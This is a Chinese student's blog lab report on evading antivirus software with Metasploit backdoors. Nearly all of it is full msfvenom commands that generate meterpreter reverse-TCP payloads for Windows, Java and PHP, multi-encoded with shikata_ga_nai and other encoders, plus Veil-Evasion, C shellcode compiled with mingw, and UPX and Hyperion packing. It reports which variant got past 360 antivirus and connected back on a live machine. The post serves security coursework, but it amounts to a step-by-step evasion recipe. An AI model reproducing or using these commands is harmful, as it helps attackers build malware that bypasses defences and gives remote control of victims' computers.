木土金

  博客园  :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

基础

AV厂商检测恶意软件的三种主流方式:

    1. 基于特征码的检测
    2. 启发式恶意软件检测
    3. 基于行为的恶意软件检测

 

实现免杀就是防止恶意软件被这是三种方式找到。具体手段为:

    1. 改变特征码
    2. 改变行为
    3. 非常规恶意软件

 

1.实践内容

首先把上一次实验中制作的后门20164313_backdoor.exe传至win10主机中,结果直接被360删了,影子都没:

添加信任。

 

再把恶意软件上传至virscan网站中扫描,结果如下:

好吧,把名字修改为DGX_backdoor.exe

果然,裸奔的后门还是很容易被查杀的(某些杀软真的菜的抠脚)。

1.1使用msf编码器编码

作为负责人还是给您们列出本次msf要使用的参数吧:

-a <arch> 设置目标的指令集架构,这里我们选择x86即可

-platform <platform> 设置目标平台,这里是windows,可以通过-l platforms选项查看msfvenom支持的所有平台

-p <payload> 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads查看所有攻击载荷
-e <encoder> 指定编码器,我会组合使用不同的编码器,可以通过-l encoders查看所有编码器
-i <count> 指定编码迭代的次数
-f <format> 指定生成格式,可以是raw,exe,elf,jar,c语言的,python的,java的……,用-l formats查看所有支持的格式

作为负责人还是给你们列出本次的msf要使用的参数吧

 我们尝试使用msf编码器对程序进行一次到多次的编码。

  • 输入msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.198.139 LPORT=4313 -f exe > DGX_backdoor1.exe 进行一次编码,然后按照实验二的步骤将软件传至win主机中。
  •  

  •  

一次编码后没有啥实质改变,多骗了一个引擎。

  • 输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10  LHOST=192.168.198.139 LPORT=4343 -f exe > DGX_backdoor10.exe 进行10次编码。

结果还是一样,照样被查杀。

 

1.2使用msfvenom生成如jar、raw之类的其他文件

  • 输入msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 -f jar > DGX_backdoorjava.jar ,生成java文件。

显示我的攻击载荷没有被生成。

输入 msfvenom -l payloads 查看攻击载荷。

随便选一个攻击载荷。

输入 msfvenom -a x86 --platform windows -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 -f jar > DGX_backdoorjava.jar 生成jar文件。

。。。。。。。。。。。。。。。。。。。。好吧,我改名。

只有12%了!!!

  • 让我们再试试php格式,输入 msfvenom -a x86 --platform windows -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 -f php > DGX_backdoorphp.php 

 

警告我不正确的生成格式,好吧,那我们尝试一下raw的生成格式。

输入 msfvenom -a x86 --platform windows -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 -f raw > DGX_backdoorphp.php 

摔,警告我设置的目标平台与攻击载荷不兼容,得得得,我改。

输入 msfvenom -l platforms 查看msf支持目标平台。

输入 msfvenom -a x86 --platform php -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 -f raw > DGX_backdoorphp.php 

 

微笑,我看你就是故意刁难我!!!删了删了。

 

输入 msfvenom --platform php -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 -f raw > DGX_backdoorphp.php 

 

流下了激动的泪水。。。

emmm没问题才是最大的问题,据我的推测,应该是raw编码方式的问题,删了删了。

输入 msfvenom --platform php -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.198.139 LPORT=4313 x > DGX_backdoorphp.php 

难道说,php的文件都是无毒无公害的有机文件,我不信,试试裸奔的php!!!

输入 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.198.139 lport=4313 x> DGX_backdoorphp.php 

哈哈哈!果然不是免检产品,可能这么低的报错率主要是php用的人比较少吧,导致很少有黑客开发这类型的后门。

 


 

1.3veil-evasion

1。安装veil-evasion,网上有教程因此不再演示。

2.输入 veil 进入veil工具,再输入 use evasion 。

3.输入 list 查看可生成文件格式,输入 use 7 选择C语言格式。

4.输入 set LHOST 192.168.1.176 设置反弹IP端口;

输入 set LPORT 4313设置反弹连接端口;

输入 generate  生成文件;

输入 du4313 设置playload的名字;

生成成功,按照地址找到文件

-

emmm,看来还是不能免杀。


 

 1.4使用shellcode编程

1.输入 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.144 LPORT=4313 -f c 使用c语言生成shellcode

 

2.生成du4313.c执行文件

 

3.输入 i686-w64-mingw32-g++ du4313.c -o du4313.exe 生成可执行的后门程序。

迅速删除。。。


 

1.5 加壳工具

 1.压缩壳

输入 upx du4313.exe -o du4313-upx.exe 给文件加壳

emmm坚持了5分钟360不报毒

网站报毒

2.加密壳Hyperion

 将文件拷贝到/usr/share/windows-binaries/hyperion/目录中

输入 cd /usr/share/windows-binaries/hyperion/ 进入目录

输入 wine hyperion.exe -v du4313.exe du4313-hyperion.exe 生成加壳文件。

360报毒


1.6通过组合应用各种技术实现恶意代码免杀

1.使用msfvenom生成原始文件dgx-backdoor-v1.exe

2.使用msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着来10次alpha_upper编码,再来10次的countdown编码,生成可执行文件dgx-backdoor-v2.exe

3.生成shellcode

4.参考网站 https://www.freebuf.com/articles/system/100147.html 生成dgx-backdoor-v4

 

360扫描出v2和v3没能扫出v4。

 


1.7 用另一电脑实测,在杀软开启的情况下,可运行并回连成功

 

 


 

2.基础问题回答

 (1)杀软是如何检测出恶意代码的?

答:AV厂商检测恶意软件的三种主流方式:

    1. 基于特征码的检测
    2. 启发式恶意软件检测
    3. 基于行为的恶意软件检测

 (2)免杀是做什么?

答:通过特殊方法如加壳,编码,手工编写等方式使杀毒软件无法查杀。

 (3)免杀的基本方法有哪些?

答:改变特征码、改变行为、加壳、手工修改等。


3.实践总结与体会

答:这次实验还是比以往的实验有难度也更有意思了,学习了各种免杀的方式,虽然对于实时更新的杀软企业来说还是很小儿科,但还是学到了很多东西。


 

4. 开启杀软能绝对防止电脑中恶意代码吗?

答:不能,世界上就没有绝对二字,杀软企业实时更新自己的病毒库,但是网络中病毒的数量也在每日递增,总会有漏洞出现,比如这次我使用的漏洞是2016年发现的,但是至今仍然没被修补。

 

 

posted on 2019-03-31 22:37  木土金  阅读(134)  评论(0编辑  收藏